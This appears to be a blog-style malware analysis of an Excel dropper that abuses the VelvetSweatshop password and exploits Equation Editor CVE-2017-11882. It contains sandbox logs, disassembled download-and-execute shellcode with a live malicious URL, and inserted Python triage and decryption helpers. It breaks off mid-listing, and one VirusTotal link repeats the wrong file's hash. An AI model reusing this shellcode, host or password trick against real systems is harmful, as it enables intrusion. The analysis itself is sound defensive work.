The sample is an Excel file with the extension .xls.

MD5: 4e9da14a7e07654d673f3785cf58e316

SHA256: 57717904ca09bbae18c3370f06e481a95de630e53a9d8aad52bc7695e8d56a77

VT Link: https://www.virustotal.com/gui/file/cb00d3350e6066cf050eef8d7949d1a268a365d68e5ff8b3970607ad1ff2c542

Initial Triage

Let’s detonate the sample in a Windows 11 sandbox and check for malicious activities.

Fig 1: Sample detonated in a virtual environment.

Detonating the sample while running noriben.py, we observe the following:

  • Process Activity
[CreateProcess] svchost.exe:9744 > "rundll32.exe %WinDir%\system32\davclnt.dll,DavSetCookie 23.94.206.104 hxxp://23[.]94[.]206[.]104/iccvf"	[Child PID: 5044]
[CreateProcess] svchost.exe:9744 > "rundll32.exe %WinDir%\system32\davclnt.dll,DavSetCookie 23.94.206.104 hxxp://23[.]94[.]206[.]104/iccvf"	[Child PID: 5544]
[CreateProcess] svchost.exe:856 > "%ProgramFiles% (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE -Embedding"	[Child PID: 10280]
[CreateProcess] EQNEDT32.EXE:10280 > "%AppData%\conhost.exe "	[Child PID: 7608]
[CreateProcess] svchost.exe:9744 > "rundll32.exe %WinDir%\system32\davclnt.dll,DavSetCookie 23.94.206.104 hxxp://23[.]94[.]206[.]104/"	[Child PID: 9772]
[CreateProcess] svchost.exe:9744 > "rundll32.exe %WinDir%\system32\davclnt.dll,DavSetCookie 23.94.206.104 hxxp://23[.]94[.]206[.]104/"	[Child PID: 10044]
[CreateProcess] svchost.exe:9744 > "rundll32.exe %WinDir%\system32\davclnt.dll,DavSetCookie 23.94.206.104 hxxp://23[.]94[.]206[.]104/"	[Child PID: 6160]

When the file is opened, it downloads a file from 23[.]94[.]206[.]104, which is processed by Equation Editor. Equation Editor then executes a file named conhost.exe, after which we see further connections to 23[.]94[.]206[.]104.
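As an added example (not part of the original post), the following Python applies three checks to Noriben lines like those above, re-typed from the log with tabs replaced by spaces: Equation Editor spawning a child process, a DavSetCookie call naming an external host, and Equation Editor writing an executable.

```python
import re

# Constructed sample: Noriben output re-typed from the lines in the post
# (tabs replaced by two spaces so the sample stays a plain string).
NORIBEN_LOG = r'''
[CreateProcess] svchost.exe:9744 > "rundll32.exe %WinDir%\system32\davclnt.dll,DavSetCookie 23.94.206.104 hxxp://23[.]94[.]206[.]104/iccvf"  [Child PID: 5044]
[CreateProcess] svchost.exe:856 > "%ProgramFiles% (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE -Embedding"  [Child PID: 10280]
[CreateProcess] EQNEDT32.EXE:10280 > "%AppData%\conhost.exe "  [Child PID: 7608]
[CreateFile] EQNEDT32.EXE:10280 > %AppData%\conhost.exe  [SHA256: fa99b97ae8564e4a6a87d79855b665a462a80a9eeabe5b2d2ccc03a5bea52d10]
[CreateFile] conhost.exe:7608 > %LocalAppData%\Temp\nsm4051.tmp\System.dll  [SHA256: bd046e6497b304e4ea4ab102cab2b1f94ce09bde0eebba4c59942a732679e4eb]
'''

# "[Op] image:pid > rest"
LINE_RE = re.compile(r'^\[(?P<op>\w+)\] (?P<image>[^:\s]+):(?P<pid>\d+) > (?P<rest>.*)$')
# CreateProcess rest: "command line"  [Child PID: n]
CHILD_RE = re.compile(r'^"(?P<cmd>.*)"\s+\[Child PID: (?P<cpid>\d+)\]$')
# CreateFile rest: path  [SHA256: hash]
FILE_RE = re.compile(r'^(?P<path>.*?)\s+\[SHA256: (?P<sha>[0-9a-fA-F]{64})\]$')


def parse(log: str):
    """Turn Noriben lines into dicts; unknown lines are skipped."""
    events = []
    for raw in log.strip().splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        ev = {"op": m["op"], "image": m["image"].lower(), "pid": int(m["pid"])}
        rest = m["rest"]
        if ev["op"] == "CreateProcess":
            c = CHILD_RE.match(rest)
            ev["cmd"] = c["cmd"].strip() if c else rest
            ev["child_pid"] = int(c["cpid"]) if c else None
        elif ev["op"] in ("CreateFile", "DeleteFile"):
            f = FILE_RE.match(rest)
            ev["path"] = (f["path"] if f else rest).strip()
        events.append(ev)
    return events


def triage(log: str):
    """Return (rule, detail) pairs for the behaviours documented in the post."""
    findings = []
    for ev in parse(log):
        # Equation Editor has no business launching anything: the classic
        # CVE-2017-11882 post-exploitation signal.
        if ev["image"] == "eqnedt32.exe" and ev["op"] == "CreateProcess":
            findings.append(("EQNEDT32 spawned child", ev["cmd"]))
        # davclnt.dll,DavSetCookie <host> <url>: WebDAV client reaching out.
        if ev["op"] == "CreateProcess" and "davclnt.dll,davsetcookie" in ev["cmd"].lower():
            findings.append(("WebDAV DavSetCookie to external host", ev["cmd"].split()[2]))
        # The exploit's shellcode writes its payload before running it.
        if ev["image"] == "eqnedt32.exe" and ev["op"] == "CreateFile" and ev["path"].lower().endswith(".exe"):
            findings.append(("EQNEDT32 wrote executable", ev["path"]))
    return findings


if __name__ == "__main__":
    for rule, detail in triage(NORIBEN_LOG):
        print(f"{rule}: {detail}")
```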

  • File Activity
[CreateFile] EXCEL.EXE:4528 > %LocalAppData%\Microsoft\Windows\INetCache\IE\EOQ0LJX8\microsotballonininsterestedproductwhichlaunchedworldwideforupdaeandupgradethenewthingsonthemarket.doc	[SHA256: cb00d3350e6066cf050eef8d7949d1a268a365d68e5ff8b3970607ad1ff2c542]
[CreateFile] EQNEDT32.EXE:10280 > %LocalAppData%\Microsoft\Windows\INetCache\IE\EOQ0LJX8\conhost[1].exe	[SHA256: fa99b97ae8564e4a6a87d79855b665a462a80a9eeabe5b2d2ccc03a5bea52d10]
[CreateFile] EQNEDT32.EXE:10280 > %AppData%\conhost.exe	[SHA256: fa99b97ae8564e4a6a87d79855b665a462a80a9eeabe5b2d2ccc03a5bea52d10]
[DeleteFile] conhost.exe:7608 > %LocalAppData%\Temp\nst3767.tmp
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Sengevders.Pep	[SHA256: 4574e94d0f0a27ba498b63b52c1c8be0f1d10dff8b744d3ca85ccbc3a9909846]
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Blankovekselen\Sirupskagen\Kreture.cla	[SHA256: aa29c94affed7df0fb98bf73cf3c80801ba40709d29a10478385eaf449b96bb8]
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Blankovekselen\Sirupskagen\Krimsk.hai	[SHA256: 1d44d77a1338511c764d8dfd61098120c448e08a15cbf0d1891dde76ba815566]
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Blankovekselen\Sirupskagen\disquiparation.fng	[SHA256: bececeb4b1c87a8a7d2ac196c19b4cd4ad9bbfa62698101b82e0d0c8a763086c]
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Embraceor\Skibonits\endosseredes.txt	[SHA256: 7d82d4289f9fedd9d080cd4d1f65a045aa20c022b98dc3840bee141b9b572118]
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Embraceor\Skibonits\eskadronen.ups	[SHA256: 7d5604f7815d42a9a432f6836cd7a3c628dd24dbf33995e5dd980a08b69d84e2]
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Tagrytteren\Protests\bashfully\zannos.dip	[SHA256: 541ddf79e94f50b04efdb22b8dcb3a3c6e7e72db3c91ca75e27d060047a69e14]
[DeleteFile] conhost.exe:7608 > %LocalAppData%\Temp\nsm4051.tmp
[CreateFile] conhost.exe:7608 > %LocalAppData%\Temp\laartungerne.lnk	[SHA256: be44eeb508234ea5a0c9b82ccedde7149f0fcf143743bac0f2838c102abff59c]
[CreateFile] conhost.exe:7608 > %LocalAppData%\Temp\laartungerne.lnk	[SHA256: be44eeb508234ea5a0c9b82ccedde7149f0fcf143743bac0f2838c102abff59c]
[CreateFile] conhost.exe:7608 > %LocalAppData%\Temp\nsm4051.tmp\System.dll	[SHA256: bd046e6497b304e4ea4ab102cab2b1f94ce09bde0eebba4c59942a732679e4eb]

By examining the file activity, it becomes clear that the file microsotballonininsterestedproductwhichlaunchedworldwideforupdaeandupgradethenewthingsonthemarket.doc is downloaded. Then conhost.exe is downloaded, which in turn creates various files under %AppData% and the Temp directory.

  • Network Activity

Running Wireshark in the background, we can capture the network connections made to 23[.]94[.]206[.]104, which show an RTF file and an exe file being downloaded.

Fig 2: Download of an RTF file from 23[.]94[.]206[.]104
Fig 3: Download of conhost.exe from 23[.]94[.]206[.]104

Further communication observed:

Fig 4: Further communication to 23[.]94[.]206[.]104

From the process, file and network activity, we see the following steps when the xls file is opened:

  • Downloads an RTF file from 23[.]94[.]206[.]104
  • Equation Editor parses the RTF file, which triggers the vulnerability.
  • It downloads an exe file from 23[.]94[.]206[.]104
  • The exe file writes itself to the tmp folder and connects to 23[.]94[.]206[.]104
  • However, its execution stops because it detects that it is running in a VM.

Digging deeper

Excel File

The excel file can be analyzed using ole tools such as oledump and oledir.

Fig 5: Oledir mentions a stream exploiting a known vulnerability.
The oledir output shows a stream containing suspicious code. We can dump it later and examine the code.

Fig 6: The xls file is password protected.

From oletools, it is clear that the Excel file is password protected. It doesn’t contain any macro code. To make the analysis easier, we can use msoffcrypto-crack.py to decrypt the file. Malicious Excel files commonly use VelvetSweatshop as the password, because Excel tries it automatically, so the file opens and the malicious code runs without prompting the user.

Fig 7: Password is VelvetSweatshop.
Fig 8: Oledump output after decryption; the password flag is now removed.
Fig 9: Stream shows a URL string from 23[.]94[.]206[.]104 downloading a doc file.

We can use strings to see the URL in the clear:

Fig 10: The URL which downloads the file.

This is the same URL seen in Fig 2, which downloads the RTF file.

RTF File

RTF file downloaded from 23[.]94[.]206[.]104.

MD5: bcf1451b6bb1a36c12a0abf8f4875cd4

SHA256: cb00d3350e6066cf050eef8d7949d1a268a365d68e5ff8b3970607ad1ff2c542

VT Link: https://www.virustotal.com/gui/file/cb00d3350e6066cf050eef8d7949d1a268a365d68e5ff8b3970607ad1ff2c542

We can see the CLSID of Equation Editor in the RTF file, which ensures that the file is processed by Equation Editor.

Fig 11: Highlighted bytes show the CLSID of Equation Editor.

Checking with the rtfdump tool, an object is clearly shown:

Fig 12: Object in the RTF file.

To dump this object, we can use the rtfobj tool:

Fig 13: Object dumped from the RTF file.

This object most likely contains shellcode that is executed once the vulnerability in Equation Editor is exploited. There are certain tricks for spotting shellcode patterns, but they don’t always work. We can use scdbg to find the shellcode.
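As an added example (not from the original post, and not rtfobj itself), here is a small Python triage script that pulls the \objdata blobs out of an RTF, parses the OLE 1.0 object header, and flags objects aimed at Equation Editor by class name or by the {0002CE02-0000-0000-C000-000000000046} CLSID; the RTF it runs on is constructed inline, not the real sample.

```python
import re
import struct

# Equation Editor 3.0 CLSID {0002CE02-0000-0000-C000-000000000046} as laid
# out on disk: Data1/Data2/Data3 little-endian, Data4 as written.
EQNEDT_CLSID = bytes.fromhex("02CE020000000000C000000000000046")


def lp_ansi(s: bytes) -> bytes:
    """LengthPrefixedAnsiString (MS-OLEDS): u32 length incl. NUL, then bytes."""
    return struct.pack("<I", len(s) + 1) + s + b"\0"


def build_ole1_embedded(class_name: bytes, native: bytes) -> bytes:
    """Build an OLE 1.0 EmbeddedObject blob, the payload of \\objdata."""
    header = struct.pack("<II", 0x00000501, 2)          # OLEVersion, FormatID=2
    header += lp_ansi(class_name) + lp_ansi(b"") + lp_ansi(b"")  # Class, Topic, Item
    return header + struct.pack("<I", len(native)) + native


def parse_ole1(blob: bytes) -> dict:
    """Inverse of build_ole1_embedded: class name plus the native data."""
    version, fmt = struct.unpack_from("<II", blob, 0)
    off, names = 8, []
    for _ in range(3):                                   # ClassName, TopicName, ItemName
        (n,) = struct.unpack_from("<I", blob, off)
        off += 4
        names.append(blob[off:off + n].rstrip(b"\0"))
        off += n
    (size,) = struct.unpack_from("<I", blob, off)
    off += 4
    return {"version": version, "format": fmt,
            "class": names[0].decode("latin-1"), "native": blob[off:off + size]}


def extract_objdata(rtf: bytes):
    """Yield the hex-decoded bytes of every \\objdata run in the document."""
    for m in re.finditer(rb"\\objdata\b", rtf):
        j, hexchars = m.end(), bytearray()
        while j < len(rtf) and rtf[j] not in b"}{\\":     # stop at group/control
            if rtf[j] in b"0123456789abcdefABCDEF":
                hexchars.append(rtf[j])
            j += 1
        yield bytes.fromhex(hexchars.decode()[: len(hexchars) & ~1])


def triage_rtf(rtf: bytes):
    """Report each embedded object and whether it targets Equation Editor."""
    results = []
    for blob in extract_objdata(rtf):
        obj = parse_ole1(blob)
        obj["eqnedt"] = (obj["class"].lower().startswith("equation")
                         or EQNEDT_CLSID in obj["native"])
        del obj["native"]
        results.append(obj)
    return results


# Constructed sample RTF (not the real file): one "Equation.3" object whose
# native data carries the Equation Editor CLSID, plus a harmless Package object.
_NATIVE = b"CONSTRUCTED-OLE-DATA" + EQNEDT_CLSID + b"\0" * 16
SAMPLE_RTF = (b"{\\rtf1{\\object\\objemb{\\*\\objclass Equation.3}{\\*\\objdata "
              + build_ole1_embedded(b"Equation.3", _NATIVE).hex().encode()
              + b"}}{\\object\\objemb{\\*\\objdata "
              + build_ole1_embedded(b"Package", b"harmless").hex().encode()
              + b"}}}")

if __name__ == "__main__":
    for r in triage_rtf(SAMPLE_RTF):
        print(r)
```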

Fig 14: Shellcode found in the dumped object.

It is clear from the output that the shellcode downloads conhost.exe from 23[.]94[.]206[.]104.

Shellcode analysis

The output from scdbg doesn’t give the full picture. We can use x64dbg to dump the shellcode properly.

In order to debug Equation Editor, we need to create a key under Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options named eqnedt32.exe.

Once it is created, we add a string value named Debugger under that key and set it to the path of the x64dbg executable.

This ensures that whenever Equation Editor is launched, it is started under the debugger.

After spending some time, we are able to extract the shellcode.

Exploitation of vulnerability

This exploit has been analyzed thoroughly. One can refer to the blogs below for more insights:

  1. Unit42: https://unit42.paloaltonetworks.com/unit42-analysis-of-cve-2017-11882-exploit-in-the-wild/
  2. LastLine: https://www.lastline.com/labsblog/evading-static-analyzers-by-solving-the-equation-editor/
  3. QuickHeal: https://blogs.quickheal.com/obfuscated-equation-editor-exploit-cve-2017-11882-spreading-hawkeye-keylogger/

Equation Editor is built without DEP and ASLR, so the addresses do not change. While analyzing this sample, the function at 0x0041160F gets invoked twice. Initially it is called from 0x00411349 and then from 0x004115D3, at which point the exploit is triggered. The function returns into the exploit code written onto the stack, as shown below.

The code written onto the stack, which jumps to the shellcode:

0019ECB4 | B8 FDBDD749              | mov eax,49D7BDFD                        |
0019ECB9 | 25 3CBF4526              | and eax,2645BF3C                        |
0019ECBE | 8B18                     | mov ebx,dword ptr ds:[eax]              |
0019ECC0 | 8B33                     | mov esi,dword ptr ds:[ebx]              | 
0019ECC2 | BA CEC6F8D4              | mov edx,D4F8C6CE                        | 
0019ECC7 | 81F2 7EA1BED4            | xor edx,D4BEA17E                        | 
0019ECCD | 8B12                     | mov edx,dword ptr ds:[edx]              | 
0019ECCF | 56                       | push esi                                |
0019ECD0 | FFD2                     | call edx                                |
0019ECD2 | 05 3A819EF2              | add eax,F29E813A                        |
0019ECD7 | 05 557F610D              | add eax,D617F55                         |
0019ECDC | FFE0                     | jmp eax                                 |

The above code gets the starting address of the global memory region where the user-crafted RTF file is stored. It then calculates the starting point of the shellcode and begins executing it.

The initial routine of the shellcode decrypts the rest of the shellcode and jumps to it, as shown below:

pop eax                            # eax = starting address of the shellcode (return address of the preceding call)
add eax,259                        # eax = start of the encrypted region
lea ebx, dword ptr ds:[eax+281]    # ebx = end of the encrypted region (0x281 bytes)
imul ecx,ecx,0                     # ecx = 0, seed of the running key
imul ecx,ecx,C231DF5               # loc_a: key = key * 0xC231DF5
add ecx,CD5B387                    #        + 0xCD5B387 (mod 2^32)
pushfd                             # junk: the indented block saves eax and the flags,
 push eax                          # fiddles with eax, then restores both, so it has no effect
 add eax,48A0
 lea eax,dword ptr ds:[eax+2795]
 sub eax,14F3
 lea eax,dword ptr ds:[eax+22A3]
 pop eax
 popfd
xor dword ptr ds:[eax],ecx         # decrypt one dword with the current key
add eax,4
cmp eax,ebx
jb  loc_a                          # loop until eax reaches the end of the region
sub esp,22C
call 4e31489                       # execution continues in the decrypted portion
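The decryption loop above re-implemented in Python as an added example (not the post's own code) so the keystream can be reproduced offline against a dumped buffer; the buffer it runs on is constructed here, and the 0x259/0x281 offsets are the ones from the stub.

```python
MASK = 0xFFFFFFFF
MUL = 0x0C231DF5   # imul ecx,ecx,C231DF5
INC = 0x0CD5B387   # add  ecx,CD5B387


def keystream(n_dwords: int):
    """Reproduce the running key: ecx starts at 0 (imul ecx,ecx,0) and every
    iteration computes ecx = ecx*MUL + INC (mod 2^32) before the XOR, so the
    key is a linear congruential sequence, not a fixed constant."""
    ecx = 0
    for _ in range(n_dwords):
        ecx = (ecx * MUL + INC) & MASK
        yield ecx


def xor_region(buf: bytes, start: int = 0x259, length: int = 0x281) -> bytes:
    """Apply the loop to buf[start:start+length] (defaults: add eax,259 /
    lea ebx,[eax+281]). The loop condition is 'eax < ebx' with a step of 4,
    so a length that is not a multiple of 4 XORs the final dword in full,
    overrunning by up to 3 bytes exactly as the shellcode does. XOR is
    symmetric, so the same function encrypts and decrypts."""
    data = bytearray(buf)
    n_dwords = (length + 3) // 4
    off = start
    for key in keystream(n_dwords):
        chunk = data[off:off + 4]                    # may be short at end of buffer
        kb = key.to_bytes(4, "little")
        data[off:off + len(chunk)] = bytes(c ^ k for c, k in zip(chunk, kb))
        off += 4
    return bytes(data)


# Constructed sample dump: 0x259 bytes of untouched stub, then a recognisable
# payload region long enough to cover the 0x281-byte window.
PLAIN = b"\x90" * 0x259 + b"kernel32\0LoadLibraryW\0GetProcAddress\0" * 18
ENCRYPTED = xor_region(PLAIN)


def demo() -> bool:
    """Encrypt, then decrypt, the constructed buffer and confirm the round trip."""
    return (xor_region(ENCRYPTED) == PLAIN
            and ENCRYPTED[0x259:0x25D] != PLAIN[0x259:0x25D])


if __name__ == "__main__":
    print("first keys:", [hex(k) for k in keystream(3)])
    print("round trip ok:", demo())
```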

After letting the decryption routine run, we can dump the shellcode and analyze it in Ghidra. Data and code are mixed together, which makes it difficult for the decompiler. By carefully analyzing it, we can separate the data from the code.

Cleaned and decrypted shellcode:

                            LAB_00000464                                    XREF[2]:     0000038d(j), 0000043c(j)  
        00000464 39 d8           CMP        EAX,EBX
        00000466 0f 82 b7        JC         LAB_00000323
                 fe ff ff
        0000046c 81 ec 2c        SUB        ESP,0x22c
                 02 00 00
        00000472 e8 12 00        CALL       FUN_00000489                                     undefined FUN_00000489()
                 00 00
        00000477 6b 00 65        unicode    u"kernel32"
                 00 72 00 
                 6e 00 65 
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_00000489()
            
                             FUN_00000489                                    XREF[1]:     00000472(c)  
        00000489 e8 7b 01        CALL       FUN_00000609                                     undefined FUN_00000609(undefined
                 00 00
        0000048e 89 c3           MOV        EBX,EAX
        00000490 e8 0d 00        CALL       FUN_000004a2                                     undefined FUN_000004a2()
                 00 00
        00000495 4c 6f 61        ds         "LoadLibraryW"
                 64 4c 69 
                 62 72 61 
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_000004a2()
             
                             FUN_000004a2                                    XREF[1]:     FUN_00000489:00000490(c)  
        000004a2 53              PUSH       EBX
        000004a3 e8 da 01        CALL       FUN_00000682                                     undefined FUN_00000682(undefined
                 00 00
        000004a8 89 c7           MOV        EDI,EAX
        000004aa e8 0f 00        CALL       FUN_000004be                                     undefined FUN_000004be()
                 00 00
        000004af 47 65 74        ds         "GetProcAddress"
                 50 72 6f 
                 63 41 64 
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_000004be()
             
                             FUN_000004be                                    XREF[1]:     FUN_000004a2:000004aa(c)  
        000004be 53              PUSH       EBX
        000004bf e8 be 01        CALL       FUN_00000682                                     undefined FUN_00000682(undefined
                 00 00
        000004c4 89 c6           MOV        ESI,EAX
        000004c6 e8 1a 00        CALL       FUN_000004e5                                     undefined FUN_000004e5()
                 00 00
        000004cb 45 78 70        ds         "ExpandEnvironmentStringsW"
                 61 6e 64 
                 45 6e 76 
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_000004e5()
             
                             FUN_000004e5                                    XREF[1]:     FUN_000004be:000004c6(c)  
        000004e5 53              PUSH       EBX
        000004e6 ff d6           CALL       ESI
        000004e8 68 04 01        PUSH       0x104
                 00 00
        000004ed 8d 54 24 08     LEA        EDX,[ESP + 0x8]
        000004f1 52              PUSH       EDX
        000004f2 e8 2c 00        CALL       FUN_00000523                                     undefined FUN_00000523()
                 00 00
        000004f7 25 00 41        unicode    u"%APPDATA%\\conhost.exe"
                 00 50 00 
                 50 00 44 
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_00000523()
             
                             FUN_00000523                                    XREF[1]:     FUN_000004e5:000004f2(c)  
        00000523 ff d0           CALL       EAX
        00000525 e8 0e 00        CALL       FUN_00000538                                     undefined FUN_00000538()
                 00 00
        0000052a 55 00 72        unicode    u"UrlMon"
                 00 6c 00 
                 4d 00 6f 
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_00000538()
             
                             FUN_00000538                                    XREF[1]:     FUN_00000523:00000525(c)  
        00000538 ff d7           CALL       EDI
        0000053a e8 13 00        CALL       FUN_00000552                                     undefined FUN_00000552()
                 00 00
        0000053f 55 52 4c        ds         "URLDownloadToFileW"
                 44 6f 77 
                 6e 6c 6f 
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_00000552()
             
                             FUN_00000552                                    XREF[1]:     FUN_00000538:0000053a(c)  
        00000552 50              PUSH       EAX
        00000553 ff d6           CALL       ESI
        00000555 6a 00           PUSH       0x0
        00000557 6a 00           PUSH       0x0
        00000559 8d 54 24 0c     LEA        EDX,[ESP + 0xc]
        0000055d 52              PUSH       EDX
        0000055e e8 4c 00        CALL       FUN_000005af                                     undefined FUN_000005af()
                 00 00
        00000563 68 00 74        unicode    u"http://23.94.206.104/9080/conhost.exe"
                 00 74 00 
                 70 00 3a 
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_000005af()
             
                             FUN_000005af                                    XREF[1]:     FUN_00000552:0000055e(c)  
        000005af 6a 00           PUSH       0x0
        000005b1 ff d0           CALL       EAX
        000005b3 e8 10 00        CALL       FUN_000005c8                                     undefined FUN_000005c8()
                 00 00
        000005b8 73 00 68        unicode    u"shell32"
                 00 65 00 
                 6c 00 6c 
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_000005c8()
             
                             FUN_000005c8                                    XREF[1]:     FUN_000005af:000005b3(c)  
        000005c8 ff d7           CALL       EDI
        000005ca e8 0e 00        CALL       FUN_000005dd                                     undefined FUN_000005dd()
                 00 00
        000005cf 53 68 65        ds         "ShellExecuteW"
                 6c 6c 45 
                 78 65 63 
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_000005dd()
             
                             FUN_000005dd                                    XREF[1]:     FUN_000005c8:000005ca(c)  
        000005dd 50              PUSH       EAX
        000005de ff d6           CALL       ESI
        000005e0 6a 01           PUSH       0x1
        000005e2 6a 00           PUSH       0x0
        000005e4 6a 00           PUSH       0x0
        000005e6 8d 54 24 10     LEA        EDX,[ESP + 0x10]
        000005ea 52              PUSH       EDX
        000005eb 6a 00           PUSH       0x0
        000005ed 6a 00           PUSH       0x0
        000005ef ff d0           CALL       EAX
        000005f1 e8 0c 00        CALL       FUN_00000602                                     undefined FUN_00000602()
                 00 00
        000005f6 45 78 69        ds         "ExitProcess"
                 74 50 72 
                 6f 63 65 
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_00000602()
             
                             FUN_00000602                                    XREF[1]:     FUN_000005dd:000005f1(c)  
        00000602 53              PUSH       EBX
        00000603 ff d6           CALL       ESI
        00000605 6a 00           PUSH       0x0
        00000607 ff d0           CALL       EAX

The above part of the shellcode, when executed, performs the same actions shown in Fig 14.

The shellcode also contains 3 further sub-routines that perform API hashing:

                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_00000609(undefined4 param_1)
             
             undefined4        Stack[0x4]:4   param_1                                 XREF[1]:     0000061d(R)  
                             FUN_00000609                                    XREF[1]:     FUN_00000489:00000489(c)  
        00000609 52              PUSH       EDX
        0000060a 64 8b 15        MOV        EDX,dword ptr FS:[0x30]
                 30 00 00 00
        00000611 8b 52 0c        MOV        EDX,dword ptr [EDX + 0xc]
        00000614 83 c2 0c        ADD        EDX,0xc
                             LAB_00000617                                    XREF[1]:     00000628(j)  
        00000617 8b 12           MOV        EDX,dword ptr [EDX]
        00000619 8b 4a 30        MOV        ECX,dword ptr [EDX + 0x30]
        0000061c 51              PUSH       ECX
        0000061d ff 74 24 0c     PUSH       dword ptr [ESP + param_1]
        00000621 e8 0b 00        CALL       FUN_00000631                                     undefined FUN_00000631(undefined
                 00 00
        00000626 85 c0           TEST       EAX,EAX
        00000628 74 ed           JZ         LAB_00000617
        0000062a 8b 42 18        MOV        EAX,dword ptr [EDX + 0x18]
        0000062d 5a              POP        EDX
        0000062e c2 04 00        RET        0x4
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_00000631(undefined4 param_1, undefined4 pa
             
             undefined4        Stack[0x4]:4   param_1                                 XREF[1]:     00000632(R)  
             undefined4        Stack[0x8]:4   param_2                                 XREF[1]:     00000636(R)  
                             FUN_00000631                                    XREF[1]:     FUN_00000609:00000621(c)  
        00000631 52              PUSH       EDX
        00000632 8b 4c 24 08     MOV        ECX,dword ptr [ESP + param_1]
        00000636 8b 54 24 0c     MOV        EDX,dword ptr [ESP + param_2]
        0000063a 0f b6 01        MOVZX      EAX,byte ptr [ECX]
                             LAB_0000063d                                    XREF[1]:     00000679(j)  
        0000063d 66 85 c0        TEST       AX,AX
        00000640 74 39           JZ         LAB_0000067b
        00000642 66 3b 02        CMP        AX,word ptr [EDX]
        00000645 74 29           JZ         LAB_00000670
        00000647 66 83 f8 61     CMP        AX,'a'
        0000064b 72 06           JC         LAB_00000653
        0000064d 66 83 f8 7a     CMP        AX,'z'
        00000651 76 0c           JBE        LAB_0000065f
                             LAB_00000653                                    XREF[1]:     0000064b(j)  
        00000653 66 83 f8 41     CMP        AX,'A'
        00000657 72 13           JC         LAB_0000066c
        00000659 66 83 f8 5a     CMP        AX,'Z'
        0000065d 77 0d           JA         LAB_0000066c
                             LAB_0000065f                                    XREF[1]:     00000651(j)  
        0000065f 66 83 f0 20     XOR        AX,0x20
        00000663 66 3b 02        CMP        AX,word ptr [EDX]
        00000666 74 02           JZ         LAB_0000066a
        00000668 eb 02           JMP        LAB_0000066c
                             LAB_0000066a                                    XREF[1]:     00000666(j)  
        0000066a eb 04           JMP        LAB_00000670
                             LAB_0000066c                                    XREF[3]:     00000657(j), 0000065d(j), 
                                                                                          00000668(j)  
        0000066c 31 c0           XOR        EAX,EAX
        0000066e eb 0e           JMP        LAB_0000067e
                             LAB_00000670                                    XREF[2]:     00000645(j), 0000066a(j)  
        00000670 83 c1 02        ADD        ECX,0x2
        00000673 83 c2 02        ADD        EDX,0x2
        00000676 0f b6 01        MOVZX      EAX,byte ptr [ECX]
        00000679 eb c2           JMP        LAB_0000063d
                             LAB_0000067b                                    XREF[1]:     00000640(j)  
        0000067b 83 c8 01        OR         EAX,0x1
                             LAB_0000067e                                    XREF[1]:     0000066e(j)  
        0000067e 5a              POP        EDX
        0000067f c2 08 00        RET        0x8
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_00000682(undefined4 param_1, undefined4 pa
            
             undefined4        Stack[0x4]:4   param_1                                 XREF[1]:     00000686(R)  
             undefined4        Stack[0x8]:4   param_2                                 XREF[1]:     000006ad(R)  
                             FUN_00000682                                    XREF[2]:     FUN_000004a2:000004a3(c), 
                                                                                          FUN_000004be:000004bf(c)  
        00000682 53              PUSH       EBX
        00000683 52              PUSH       EDX
        00000684 56              PUSH       ESI
        00000685 57              PUSH       EDI
        00000686 8b 54 24 14     MOV        EDX,dword ptr [ESP + param_1]
        0000068a 8b 42 3c        MOV        EAX,dword ptr [EDX + 0x3c]
        0000068d 8d 44 02 78     LEA        EAX,[EDX + EAX*0x1 + 0x78]
        00000691 8b 00           MOV        EAX,dword ptr [EAX]
        00000693 01 d0           ADD        EAX,EDX
        00000695 50              PUSH       EAX
        00000696 8b 48 18        MOV        ECX,dword ptr [EAX + 0x18]
        00000699 8b 58 20        MOV        EBX,dword ptr [EAX + 0x20]
        0000069c 01 d3           ADD        EBX,EDX
        0000069e 30 c0           XOR        AL,AL
                             LAB_000006a0                                    XREF[1]:     000006df(j)  
        000006a0 85 c9           TEST       ECX,ECX
        000006a2 74 3d           JZ         LAB_000006e1
        000006a4 51              PUSH       ECX
        000006a5 8b 0b           MOV        ECX,dword ptr [EBX]
        000006a7 8d 0c 11        LEA        ECX,[ECX + EDX*0x1]
        000006aa 89 cf           MOV        EDI,ECX
        000006ac 57              PUSH       EDI
        000006ad 8b 74 24 24     MOV        ESI,dword ptr [ESP + param_2]
        000006b1 31 c9           XOR        ECX,ECX
        000006b3 49              DEC        ECX
        000006b4 f2 ae           SCASB.RE   ES:EDI
        000006b6 f7 d1           NOT        ECX
        000006b8 5f              POP        EDI
        000006b9 f3 a6           CMPSB.REPE ES:EDI,ESI
        000006bb 75 1d           JNZ        LAB_000006da
        000006bd 59              POP        ECX
        000006be 58              POP        EAX
        000006bf 2b 48 18        SUB        ECX,dword ptr [EAX + 0x18]
